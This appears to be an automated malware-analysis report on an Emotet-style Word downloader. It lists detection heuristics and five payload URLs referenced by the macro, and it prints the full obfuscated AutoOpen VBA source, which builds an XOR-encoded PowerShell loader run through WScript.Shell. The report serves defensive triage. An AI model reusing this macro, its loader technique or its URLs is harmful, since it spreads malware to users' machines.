MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a function that utilizes CreateObject("Wscript.shell") to run commands. This is a common technique for downloading and executing further malicious content, consistent with downloader malware families like Emotet.
Heuristics 11
-
ClamAV: Doc.Downloader.Emotet-6958939-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6958939-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
rzikS = YUEPZh + WCApEq + FiovAS + iwnHAc + 38783 - NVbQiC LqNLESVwwWh = tNWLvdoLwiC + CreateObject("Wscript.shell").Run(JYBManR + Chr(vbKeyP) + hjIRTT + Chr(vbKeyO) + sJioCZaii + EawwpJb, 194919841 - 194919841) HwLXY = jfBsUP + iBZQI + iolwqc + sIiKM + 50254 - Jwtlkr -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
rzikS = YUEPZh + WCApEq + FiovAS + iwnHAc + 38783 - NVbQiC LqNLESVwwWh = tNWLvdoLwiC + CreateObject("Wscript.shell").Run(JYBManR + Chr(vbKeyP) + hjIRTT + Chr(vbKeyO) + sJioCZaii + EawwpJb, 194919841 - 194919841) HwLXY = jfBsUP + iBZQI + iolwqc + sIiKM + 50254 - Jwtlkr -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "ZhsLvFjKSmi" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://cabinetrollouts.com/qWp1mtn/ Referenced by macro
- http://linhkienlaptopcaugiay.com/ZxDRM0Puj6/Referenced by macro
- http://sibirsv.ru/FfT6HoEX44/Referenced by macro
- http://thegilbertlawoffice.com/JPBBcS/Referenced by macro
- http://xn----8sbgmannhvdcal2bf9m.xn--p1ai/X6DRCTET/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12394 bytes |
SHA-256: 0dac2a1a908467df649f26dd2ac13e0166e212ca64fd6c9cf80a7b5ea39d8446 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
282 of 521 identifiers look randomly generated (e.g. 'LqNLESVwwWh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "HAlOwdHTu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZhsLvFjKSmi"
Sub AutoOpen()
On Error Resume Next
atRip = pRbwjU + oziVr + nPsXZ + KIRPJn + 45495 - Omwmd
POqFtr = CqzFOt + mJiWs + icYCRL + AtBww + 85258 - vYYnd
mdTNsX = PzHVn + DtYHt + NrDHcB + IjsYO + 21082 - woklka
TnzWC = wIikA + zEzdRA + DWTVJ + iFkcjv + 31205 - YaVri
VtTfz = wMhZjp + zPnzSn + TuLjwo + jaibln + 87317 - JDoVO
wHSRKu = zhFEct + Inqonh + tJoAJV + cNkusL + 74455 - KGsWS
sazLHqXPJ (DqHzNfIUUI + ThUMFsqz + zaERfVmDEnn)
kRjpE = hvFbb + IKDXl + NArFX + BPFisq + 8477 - Cbatkv
YNGsSi = CmVcL + njMit + opSDDP + tNhkK + 74500 - VonkNE
WXKvuE = AlaDD + nbinjK + QlDzv + wuFjL + 94575 - zzWAk
End Sub
Function sazLHqXPJ(sJioCZaii)
On Error Resume Next
VzuSoK = iLhdhk + iarRz + IVuWmi + czhGQ + 31928 - ZmMCNA
nVRSv = fsjliw + cAFYj + ALjib + QsjrO + 77455 - zZUAc
hMTJQ = BtSOvz + HJGKDc + lGVCLp + jzwcR + 79021 - Hcztn
MdKKaR = wjQJl + MJikAw + VQHZET + piNoIo + 22841 - Llprf
BDrqqV = EmrQjJ + vVlGG + LSVcBz + uzwuIT + 29223 - NQiNw
rzikS = YUEPZh + WCApEq + FiovAS + iwnHAc + 38783 - NVbQiC
LqNLESVwwWh = tNWLvdoLwiC + CreateObject("Wscript.shell").Run(JYBManR + Chr(vbKeyP) + hjIRTT + Chr(vbKeyO) + sJioCZaii + EawwpJb, 194919841 - 194919841)
HwLXY = jfBsUP + iBZQI + iolwqc + sIiKM + 50254 - Jwtlkr
UCCJXt = vYZoT + QjWwUu + Dazrj + fOjIof + 32937 - NmioTj
lrWXY = nWqAjl + SjhOpt + hGpwHP + EiECsI + 58276 - azEcSz
End Function
Function DqHzNfIUUI()
On Error Resume Next
BHdCW = (60585 - bzwWdl * uYCTOU + cjVbC * (sWGMD / jIRko * OCjuz + hEDok))
YpZpPm = (9024 - ivAIV * TmstIA + WhwntG * (fiwdfk / YNqau * LuwaLq + iJckZH))
RLncZY = (14418 - TRlFtl * GCjco + OzRph * (SuzLDl / vsjHjt * OkzQdB + kaCWL))
wSmTvu = "wershel" + "l " + " " + " -" + "jOIn" + Chr(40) + "'6" + "3,89n112M" + "87x38" + "o117" + "Q126n108" + "n54r"
XKUbK = (33877 - LbRpf * ztJaFf + QQJRB * (zYQmOR / GVWts * nhXmZt + uZPuhU))
MCMVnr = (77314 - fWGhUN * aXuzjL + iBBLjW * (TuosoT / jNUsEo * OrjJoW + DIZbl))
OwHACa = (35855 - hvpDY * nbXPhX + ptikYX * (ZJWEuU / JOVqSO * AcwWV + Hwriz))
ulIoQcGh = "116s121,1" + "13P126n" + "120o" + "111,59Q8" + "5s126" + "M111P53" + "P76Q"
pFjnik = (74518 - DcffRG * fLnXYb + NzQtLN * (zjIMp / mVKhfS * BjkNLW + hCipF))
EYDdQi = (4610 - sXYkI * ndNCZ + JWoRh * (CWpbR / FzPPFl * MPtcc + MNSNd))
srkWo = (48162 - bEsWT * fuJBFs + mvdPC * (prnwFT / jjukn * GtNzrN + krcXBY))
pQoSHAuBV = "126r1" + "21s8" + "8n119Y1" + "14o12" + "6s117x1" + "11s32Y" + "63,8" + "8r84" + "M86x38" + "P60s115" + "M111s111x" + "107o"
nzwcS = (25109 - lSXLG * ElJSIv + PzwIh * (ZHDmSI / KUMnD * FcluDi + bdEkKp))
zWwOUU = (13297 - hnHnDM * wzYNMm + ZwmCH * (wPQvjV / JmjQS * WMaqEJ + pucwnM))
mvnwqu = (48727 - CifEDn * kYWPK + ziFvdk * (vCScc / jOhNw * YRZDO + aKEtjO))
muUCJIftfGS = "33M52Y" + "52s120" + "M122o121" + "o114" + "o117,12" + "6Q111o" + "105s1" + "16,119" + "M119,11"
psdRqr = (12638 - kuriL * iYPME + qGVzz * (faPVSK / PsFlZ * HDZOW + ubprPp))
iBpRiD = (24971 - HsAPD * nGICLa + mYXbq * (DZNBWE / zOrwwJ * zQZYnL + nEvqU))
mTziWi = (35668 - MftPc * dviYnp + wwQsz * (FMqiA / jXiSJi * GDvXf + tBRfLT))
rsrOa = "6Q110" + "r111Q" + "104r53s" + "120P116Q" + "118P52n" + "106s7" + "6,107x4"
duRaot = (92769 - RwZKqh * Cmajs + inppc * (wcFWR / omiPft * oWuuT + itSON))
zcpUhq = (44587 - NqVwt * tIudUp + iCBaks * (PojfP / jGhNl * LttMZ + mQAtWC))
pJpzH = (53822 - LtwULc * jBupm + hMDij * (VmuGfO / DcUwnW * viaqBi + MVjwc))
XjiTLuzIbz = "2n11" + "8,11" + "1M117n5" + "2s91" + "s115,111" + "x111"
qJcump = (85965 - OpzjDi * TjFjw + jLSOh * (pikfcH / RtKrjJ * FJSiQ + JIajp))
GlcFLP = (28547 - zRmSG * YfMDH + zMwmN * (AZJRNI / mmSzO * YHjzQn + uPujJ))
LOHwJf = (8541 - DAdJVZ * NWJoZ + cJZsj * (VqjHBp / wVJvBM * SRFjIN + twlRuQ))
tvazZQWC = "o107Y" + "33M52" + "x52Q1" + "19x11" + "4P117x115" + "s112,114n"
TYYBo = (41989 - ZHGbD * urPha + jwEmPq * (uAthBl / qGbpPo * YFlLT + kudzN))
iEhFZh = (68011 - WsbTs * wDbIcz + KDtjW * (cuvpH / ANQcp * fsRvME + VNusKJ))
YdUOl = (17131 - zbDja * qXdnQ + RmRHrT * (vhDzWv / iMCVs * jFpsVZ + FdmHH))
GCJCJHzp = "126Y1" + "17P119Q1" + "22o10" + "7n111" + "Y116P1" + "07s120r12" + "2n110o" + "124P114s" + "122n9" + "8s53P1"
mcjih = (67457 - mowhw * XLhTXn + zvbiD * (zcDnR / zjWwoU * wfKqW + vhRdXP))
XvfGV = (57215 - KNcvbj * GWdUIv + uMzZmR * (VRvws / YYDFh * zfSdtR + pEiARw))
ihOrAA = (58836 - lkjBi * ADBPt + ApmmFF * (IajwjX / zQRivn * zMubor + uiQNdQ))
oYpwluWi = "20o116" + "r118s" + "52n65,99r" + "95n7" + "3r86x43" + "x75Q" + "110P113r" + "45,52s91Y" + "115M111" + "o111"
MEQWh = (36431 - DpBAW * tPviUf + EVimEL * (EDWqi / nwQZVS * MuRHY + YvuzOZ))
ovbmvN = (42298 - FmCdpD * lWUFIC + rLQNuO * (PkCHMK / qsAaU * GIYLBo + sttYI))
UVqVdR = (41602 - DATKV * puwVI + YbJEb * (PnKJF / QldRI * wEzuJt + wCRiAv))
izwRQBkt = "r107," + "33M52Y" + "52o1" + "04,114" + "M121" + "Q114s105" + "P104Y1" + "09r53"
OrCCU = (82880 - wfODCi * fRJBSJ + PCsBp * (CQTdsb / vWbzYa * Hrmdz + BjhcAA))
GYUtMl = (88174 - BiBtv * tjuYm + ZEEdS * (GfLwE / OdBsR * EWBhCO + PwmCSX))
qwpKA = (58454 - YjLlL * kwJpKd + BLYPOB * (jSiqc / ODwjRw * TjbfBS + zEasS))
BNJlzwUwN = "M105s" + "110r52P" + "93n125P79" + "Y45s83" + "s116n94" + "Q67x47" + "Q47Y5" + "2n91P115" + "n111o111x" + "107P"
UFojtu = (65230 - wXTrN * vEiJH + VBNNbo * (hVwQm / uVSPA * iouXb + FPVPn))
ILiaa = (90845 - YWGzUJ * MjzcY + jYRks * (wcFis / YEkCYW * WwVzd + LszMTF))
CLcbS = (85302 - IFnAqB * jSSlc + iAdpbi * (LVYkSh / NbzSDa * rDqnEV + Vnzkm))
HCHcfcfF = "33P52" + ",52P111r" + "115r1" + "26,124" + ",114n1" + "19,121r"
DqHzNfIUUI = wSmTvu + ulIoQcGh + pQoSHAuBV + muUCJIftfGS + rsrOa + XjiTLuzIbz + tvazZQWC + GCJCJHzp + oYpwluWi + izwRQBkt + BNJlzwUwN + HCHcfcfF
SzCkz = (84095 - uldfq * FFCCZ + hLKhS * (blZzvb / oZPdw * lGGzYo + dAzRlD))
iChnAo = (12986 - njDiI * tFUzi + AqwmB * (IQqhb / fjwLt * SPTZE + nFvAb))
cuFHP = (67949 - WGjvq * WBwpb + GnRbL * (tiEalH / rFjuU * NOuOA + DhmNb))
End Function
Function ThUMFsqz()
On Error Resume Next
pWUXcc = (82707 - KuQlQP * UYtHzD + WjDvWb * (GlAlV / wIAwp * JMZKpV + jdumtW))
Kqjzi = (22440 - tVWAw * UYhwwq + ihNpL * (QBHEG / cYbRh * WUbamr + zSfAW))
PAoUjF = (30275 - DJQAv * jLYuSJ + NwVOZv * (lLzHPp / zTfRj * mIQuoa + CRWraN))
FWcnzwYJW = "126r105" + "x111r" + "119,1" + "22P108x1" + "16n125" + "P125" + "M114P1" + "20x12" + "6Y53,120" + "Y116Q118o" + "52r81M7"
icvXrh = (16926 - hRBCbj * upqTS + fHoap * (dkWuM / pWcFWK * BjVjOD + UUmii))
BDSGHK = (45242 - rKIlFv * rscjiI + jbZwR * (TpHjBE / tBZKY * BQGmD + hTZdO))
whzVH = (94246 - LfIKX * JlMYpS + aQiJXZ * (iBIzs / BwHXG * ZIjWXK + ZuYIw))
apPJZE = "5o89M89," + "120,72n5" + "2o91r115P" + "111n" + "111P107o" + "33,52Q5" + "2P99" + "x117Y5" + "4Q54n54r" + "54o35s1" + "04x1" + "21x124x1"
fGSdp = (72486 - rmhzRR * LmBWw + HHbun * (utGKP / KahtOj * iHqWiz + FqBGz))
LBjfDq = (95468 - aXKWLS * oMioR + tYuuGw * (AbFtM / jJSQEh * PwkWz + sBliu))
mVLXi = (46841 - RrDkcS * GrcSY + tRSRk * (uUSEsA / AGpOK * prKnD + uPtMN))
GifoZsGiB = "18x122" + "Y117n117o" + "115M109M" + "127r" + "120s122n" + "119s41,1" + "21M125n3" + "4o118Y53"
vlvizA = (73843 - ohvGdM * wBRmnO + HuaWHX * (VqNjGM / viSfs * wncWiK + DrDqK))
iiiVV = (5427 - mkdUzn * kRSzQ + SDiijd * (MqiAI / qJSfi * nUXdLW + AsVcz))
RdBEdt = (28222 - SqiaW * aBWwHu + fUSDn * (GZimXW / vptapm * fjwtwM + qCUFj))
nBfio = "M99M117s" + "54n5" + "4Y107M" + "42Y122x11" + "4Q52M67x4" + "5o95Q7" + "3P88o79"
OwXolK = (86999 - JrRcW * wjvEw + HivzF * (pPLjKc / kZJrUu * jnhiZ + WLvjK))
LmJjA = (79085 - HonDLD * EkHwIU + owXYH * (mQXKhn / OIjKZ * qVrts + sQGFuX))
zzpkC = (49204 - GVdCcj * olwnpb + wrUwR * (pIiTb / Jiovp * SmnfC + EzlblN))
vFYNI = "P94,79s5" + "2Q60" + "Q53s" + "72r107Q" + "119x114x" + "111P51,6" + "0M91x60n" + "50P32P" + "63M1" + "14Q1"
aXtWj = (35078 - uSPfbZ * tVFjUO + LGwjd * (ZvsKnb / kJsuu * pHCAN + OtQbV))
ujsBH = (39596 - lBtwqK * HWJApI + WpVRpj * (TmNWRL / mRdjbC * Qspor + wbbav))
GjzPQz = (81708 - ULzaE * AMNjcK + GYzJFj * (OEITW / hvPVs * EotiIc + UNCfjz))
jXAYKBzo = "11M119Y59" + "Q38r59Q" + "60x42" + "M35s4" + "2x60" + "x32,63," + "106o" + "119x74" + "x38x63" + "n126Q117" + "o109n33M1"
ThUMFsqz = FWcnzwYJW + apPJZE + GifoZsGiB + nBfio + vFYNI + jXAYKBzo
pRFMmM = (12415 - BwRfq * KtjdRi + JzZBjT * (HCFzG / mCFtva * qjjPQ + ASfXfr))
JzHzG = (21258 - XrPDf * pLEwr + hGzMur * (JOFLZc / KFhnS * hijwd + cYGJIF))
LfSjLD = (87618 - RwtTZF * HnpiqS + dPJkvT * (cfZGia / kZirh * Yipvr + LKrhzA))
End Function
Function zaERfVmDEnn()
On Error Resume Next
ILHcIh = (88355 - JDVrH * icqLz + CbdfE * (wKcAHW / NNozE * aqoOfu + aYZCvR))
ZCCWa = (14649 - voSTNu * hXOHqJ + NvaOtN * (mlzcF / AEhDH * GYjPVi + DimdaG))
zphibX = (53638 - jqJvwV * KpilQZ + OMzla * (XlaEq / WYfGWh * oGzFj + IfOjYJ))
lznAKRjn = "11M126n1" + "18n1" + "07Q48n60" + "s71o60Y" + "48s63x114" + "n111" + "r119s48,6" + "0M53s126" + "x99Y1" + "26r6"
kBQEE = (33664 - LOXziv * wOJRJ + ZTMaU * (IAiGjz / QYAkq * cLlwwh + BXMTq))
BjbVk = (79690 - VNzPEF * zWiiH + wkJQG * (qSaJB / uotmw * Vhkzb + iAisI))
jvkRo = (82054 - EIZdIn * Vffwd + hhBoX * (sOwlo / PXONj * MuGiT + IoLjkW))
dIrwmCripFb = "0Y32," + "125n1" + "16M105M12" + "6,122" + "P120P1" + "15Y51r63" + "M93,114P7" + "8P59r" + "114x"
cXTjHK = (53834 - fQLXmq * dNrAYb + OKwnci * (OmnIT / EarPh * YoUCO + usTmB))
QqXiBu = (92466 - awVGWl * sQnHw + kiNCN * (fiCMi / tXXrsM * kNlvl + wAtvu))
WQoJIi = (39593 - zWQdXP * paCWb + IDAuI * (dhlzbk / lCMuRJ * zTBXqi + qFSQQa))
mKEwctClb = "117r59,6" + "3Q88n8" + "4Y86s50Q" + "96r111Q10" + "5x98P96," + "63M89" + "P112r87" + "Q53Q95Y" + "116M108s" + "117M11" + "9,116o"
tHZLL = (20219 - PDXrr * jNGaDA + CcUhZ * (HdNMzh / IQJwi * VtvAb + kFMlQ))
ONoOAw = (82369 - LYotf * QcjlNj + pCcEd * (ncTjLK / XpYjQ * EwHci + zWadmf))
ZmLARm = (84093 - RCtBrY * qUTDH + qibGbt * (pourw / avpHw * GtuSz + JCHtlt))
wdiTmc = "122,12" + "7r93x1" + "14P119o1" + "26Y51x63" + "Q93o" + "114x" + "78r55" + "M59r" + "63s106M1" + "19Y74x5" + "0Q32n72Q1"
YYBHAm = (92095 - hYBRA * GsQVGZ + zNBVFi * (iXmmQ / icHjI * swjid + zqEFY))
IDiHju = (81818 - avdHBE * wNAMUj + DvLcN * (rJvCB / oJroG * HifzR + zpfEt))
wUwYL = (160 - uHvdJm * Azwik + MAjwSi * (HIovZ / cowEFQ * vOzwV + wONzt))
dMIBlswwTJ = "11P122M" + "105x111n" + "54Y7" + "5r105Y11" + "6n120" + "r126n" + "104M104,5" + "9s63x10" + "6Q119,74r" + "32M1" + "21x10"
DNsBw = (89169 - bKzRl * YiAzdk + rqdvXV * (mJhuX / CrHLJj * GapkPf + GTROJC))
VpzznC = (11392 - bilSzE * JaEtq + cowDk * (vhKtJu / EKfqJ * zjjQc + zRNnnI))
OMkwd = (56073 - QRcFt * ZjWoq + npQBtj * (VRTsTk / XnfXO * DapJMi + iZawc))
YHbpAkv = "5s126M" + "122o" + "112s32" + "Q102M120x" + "122Q" + "111P120s1" + "15o96"
zBMSB = (48666 - VcEWLN * INwTf + jRcPzs * (XlFOM / SZOjF * ZwwEt + lHTbp))
MOYwK = (82381 - kHEwY * UZdmB + aKtNzH * (OLOwrX / wYFwp * jwvwV + kDJwBn))
dVrrf = (48629 - VITTjX * JCvAud + OFziNj * (Mlmvws / qRatpm * wFfOhC + iLThM))
iYDND = "s102n1" + "02'.Spl" + "It" + Chr(40) + "'" + "QP,Mnr" + "Yosx' " + Chr(41) + " " + "|% { [ch" + "AR]" + Chr(40) + "$_-b" + "XOr" + Chr(34) + "0x1" + "b" + Chr(34) + " " + Chr(41) + "}" + Chr(41) + " |" + "." + Chr(40) + Chr(40) + "va"
UNwQbp = (75174 - jfwNJ * HirNE + FMhtaJ * (cidhiF / PJaKwa * pwuaLw + vPFil))
OQtJS = (80951 - JXjXn * ESlVGE + HSzRTf * (aiZTOj / WaXQb * faYZIa + zzwqN))
XHfCpR = (94058 - bDwPH * ozIjR + qQOnSP * (VjSXw / XOHiXV * idNuwK + aizHZ))
AhsIwvwqBGp = "riABLe" + " '*MDr*'" + Chr(41) + ".NaME[3" + ",11,2]-" + "JoiN''" + Chr(41) + " "
zaERfVmDEnn = lznAKRjn + dIrwmCripFb + mKEwctClb + wdiTmc + dMIBlswwTJ + YHbpAkv + iYDND + AhsIwvwqBGp
iIdEZ = (4025 - OXouzi * iDCRh + QPwNzF * (QrSkEp / CfDCok * jAOFI + iMQOkz))
IrHts = (69154 - HbdIjz * jJjTl + nzNCT * (ILjmjL / jojHOm * vXCzFO + rTRCiW))
wOLPH = (39764 - LXEEp * zQzzA + zmjPiI * (ZODaEz / RloTn * TbAIvK + AjONR))
End Function
Attribute VB_Name = "zkIWssTZ"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.